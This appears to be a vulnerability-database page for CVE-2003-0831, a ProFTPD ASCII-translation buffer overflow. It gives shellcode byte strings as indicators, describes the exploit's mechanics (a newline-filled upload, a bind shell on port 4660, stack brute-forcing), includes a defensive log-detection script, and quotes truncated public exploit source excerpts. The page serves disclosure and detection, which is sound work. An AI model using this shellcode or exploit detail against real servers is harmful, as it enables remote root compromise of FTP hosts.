CVE-2003-0831

Published 2003-11-17

Priority P3 · 54 · critical · CVSS 2.0 base score 9 (vector AV:N/AC:L/Au:S/C:C/I:C/A:C)

Exploit available · EPSS 55.12% (98.9th percentile)

ProFTPD 1.2.7 through 1.2.9rc2 does not properly translate newline characters when transferring files in ASCII mode, which allows remote attackers to execute arbitrary code via a buffer overflow using certain files.
Affected (9 ranges)

| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| proftpd_project | proftpd | — | — |

Nine ranges are listed, all for proftpd_project / proftpd; no version bounds or fixed versions are recorded for any of them.
Detection & IOCs (extracted from sources)

Shellcode byte sequences from the public exploits (byte-pattern IOCs):

```text
\x31\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80\x31\xc0\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51\x89\xe1\xb3\x01\xb0\x66\xcd\x80
\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xb0\x2e\xcd\x80\x31\xc0\xb0\x02\xcd\x80\x89\xc3\x85\xdb\x74\x08\x31\xdb\x31\xc0\xb0\x01\xcd\x80
```
- The exploit triggers the vulnerability by uploading a file filled entirely with 0x0a (newline) bytes via FTP STOR in ASCII mode, then retrieving it with RETR in ASCII mode to trigger the xlate_ascii_write() buffer overflow.
- The overflow occurs in the _xlate_ascii_write() function (src/data.c) during ASCII-mode file transfer; monitor for large ASCII-mode FTP downloads following an upload of a file composed entirely of newline characters.
- The exploit requires the attacker to authenticate (even as anonymous), issue TYPE A (ASCII mode), upload a malformed file via STOR, then download it via RETR; monitor for this FTP command sequence from a single session.
- Post-exploitation, the shellcode binds a shell on port 4660 (0x1234); monitor for unexpected listening services on port 4660 on FTP servers running ProFTPD 1.2.7–1.2.9rc2.
- The exploit upload buffer is about 65 KB (EXPLOIT_BUF_SIZE 65535 / 65558 newline bytes); an unusually large ASCII-mode FTP upload composed entirely of newline bytes is a strong indicator of exploitation.
- The exploit targets specific stack addresses for RedHat 8.0 with ProFTPD 1.2.8; return addresses differ per OS/build and must be brute-forced or adjusted for other targets.
- The exploit brute-forces stack addresses between STACK_START and STACK_END; the exact range is platform-dependent and the exploit loops through candidates automatically.
- The connect-back shellcode IP and port are embedded at fixed offsets within the shellcode buffer (OFFSET=39 for IP/port, OFF2=70 for bind port); bytes that equal 0x0a ('\n') in the port value will cause the exploit to abort.
- The vulnerability may also affect ProFTPD versions prior to 1.2.7, though this has not been confirmed.
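The command-sequence indicator above (TYPE A, then STOR of a large file, then RETR of that same file from one session) can be checked against FTP command logs. The following is an added example written for this page; it is not code from the CVE record, from the public exploits, or from ProFTPD. The log line format, session ids, file names and sizes are constructed for the example, and the 32 KiB size threshold is an assumption. The last helper models the general FTP ASCII-mode rule that a bare LF is sent as CR LF, which is why a file of nothing but newline bytes doubles in size on the way out and is the worst case for a fixed-size output buffer.

```python
# Added example (not from the CVE record, the exploits or ProFTPD): replay the
# IOC command sequence over per-session FTP command logs.
import re
from collections import defaultdict

# Constructed sample log, one FTP command per line:
#   <session-id> <COMMAND> [<argument>] [size=<bytes>]
SAMPLE_LOG = """\
s1 USER anonymous
s1 PASS ftp@
s1 TYPE A
s1 STOR nl.txt size=65558
s1 RETR nl.txt
s2 USER alice
s2 TYPE I
s2 STOR report.pdf size=1200000
s2 RETR report.pdf
s3 USER anonymous
s3 TYPE A
s3 STOR readme.txt size=812
s3 RETR readme.txt
"""

LINE_RE = re.compile(
    r"^(?P<sid>\S+) (?P<cmd>[A-Z]+)(?: (?P<arg>\S+))?(?: size=(?P<size>\d+))?$"
)

# Assumed threshold: the public exploits upload roughly 65 KB of bare newlines;
# a legitimate ASCII-mode text upload that large is unusual on most servers.
LARGE_ASCII_UPLOAD = 32 * 1024


def parse_log(text):
    """Group (cmd, arg, size) tuples by session id, skipping unparseable lines."""
    sessions = defaultdict(list)
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        size = int(m["size"]) if m["size"] else None
        sessions[m["sid"]].append((m["cmd"], m["arg"], size))
    return sessions


def suspicious_sessions(sessions, threshold=LARGE_ASCII_UPLOAD):
    """Flag sessions that switch to ASCII mode (TYPE A), STOR a file of at least
    `threshold` bytes, and then RETR that same file while still in ASCII mode.
    Returns (session_id, filename, upload_size) tuples."""
    hits = []
    for sid, events in sessions.items():
        ascii_mode = False
        large_uploads = {}  # filename -> size, uploaded while in ASCII mode
        for cmd, arg, size in events:
            if cmd == "TYPE":
                ascii_mode = arg == "A"
            elif cmd == "STOR" and ascii_mode and size is not None and size >= threshold:
                large_uploads[arg] = size
            elif cmd == "RETR" and ascii_mode and arg in large_uploads:
                hits.append((sid, arg, large_uploads[arg]))
    return hits


def is_all_newlines(payload):
    """True when an uploaded payload is non-empty and consists only of 0x0a bytes,
    the file content the IOC list singles out."""
    return len(payload) > 0 and payload.count(b"\n") == len(payload)


def crlf_translated_length(payload):
    """Output length after ASCII-mode translation of a bare LF to CR LF (an LF
    already preceded by CR is passed through). A file of bare newlines doubles."""
    out = 0
    prev = None
    for b in payload:
        out += 2 if (b == 0x0A and prev != 0x0D) else 1
        prev = b
    return out


if __name__ == "__main__":
    for sid, name, size in suspicious_sessions(parse_log(SAMPLE_LOG)):
        print(f"session {sid}: ASCII-mode STOR then RETR of {name} ({size} bytes)")
    newline_file = b"\n" * 65558
    print(is_all_newlines(newline_file), crlf_translated_length(newline_file))
```

Only session s1 is reported: s2 transfers in binary mode (TYPE I), and s3 stays under the size threshold. Where the server logs or stores upload content, `is_all_newlines` on the stored file narrows the alert further, and `crlf_translated_length` gives the size the ASCII-mode output path must be prepared to handle for a given upload.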
No detection rules found.
Exploit-DB: ProFTPd 1.2.7 < 1.2.9rc2 - Remote Code Execution / Brute Force (exploitdb, 2003-10-13)

```c
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define STACK_START 0xbfffef04
#define STACK_END 0xbffff4f0
#define FTP_PORT 21
#define BINDSHELL_PORT 4660
#define SIZE 1024
#define EXPLOIT_BUF_SIZE 65535
#define DEFAULT_USER "anonymous"
#define DEFAULT_PASS "ftp@"
#define FAILURE -1
#define SUCCESS 0
#define NORMAL_DOWNLOAD 1
#define EXPLOIT_DOWNLOAD 2
#define DOWNLOAD 3
#define UPLOAD 4
#define ACCEPT_TIMEOUT 5
#define SLEEP_DELAY 19999999
/*
Leet 0-day HaggisCode (tm)
*/
char shellcode[] =
// setuid(0); setgid(0);
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xb0\x2e\xcd\x80"
// fork() - parent terminates, killing proftpd and ending FTP
// session. This leaves the child process as a daemon...
"\x
```
Exploit-DB: ProFTPd 1.2.9 rc2 - '.ASCII' File Remote Code Execution (1) (exploitdb, 2003-10-04)

```c
/* proftpd 1.2.7/1.2.9rc2 remote root exploit by bkbll (bkbll#cnhonker.net, 2003/10/1)
 * for FTP_ProFTPD_Translate_Overflow found by X-force
 * happy birthday, China.
 * this code is dirty, there are more beautiful exploits of proftpd for this vuln in the world.
 * this code want to provied u a method, not finally exploit.
 * using overflow _xlate_ascii_write function return address.
 * because the overflow is before it connecting to our port,so I have no method for using current socket.
 * and I have provied two method:bind port and connect back.
 */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define PORT 21
#define SIZE 1024
#define BIGSIZE 1024*42
#define
```
Exploit-DB: ProFTPd 1.2.7/1.2.8 - '.ASCII' File Transfer Buffer Overrun (exploitdb, 2003-09-23)

Source: https://www.securityfocus.com/bid/8679/info

A remotely exploitable buffer overrun vulnerability has been reported in ProFTPD. This issue could be triggered if an attacker uploads a malformed file and then that file is downloaded in ASCII mode. Successful exploitation will permit a malicious FTP user with upload access to execute arbitrary code in the context of the FTP server.

It is also reported that ProFTPD does not adequately drop privileges in some circumstances, which may compound the risks associated with exploitation.

This issue could also affect versions prior to 1.2.7, though this has not been confirmed.

```c
/*
 * -- ProFTPd [1.2.7-1.2.8] proof-of-concept --
 *
 * This code is quite ugly, don't have time cle
```
No writeups or analysis indexed.
References

- http://lists.grok.org.uk/pipermail/full-disclosure/2003-October/012072.html
- http://marc.info/?l=bugtraq&m=106441655617816&w=2
- http://marc.info/?l=bugtraq&m=106606885611269&w=2
- http://secunia.com/advisories/9829
- http://www.kb.cert.org/vuls/id/405348
- http://www.mandriva.com/security/advisories?name=MDKSA-2003:095
- http://xforce.iss.net/xforce/alerts/id/154
- https://exchange.xforce.ibmcloud.com/vulnerabilities/12200
- https://www.exploit-db.com/exploits/107/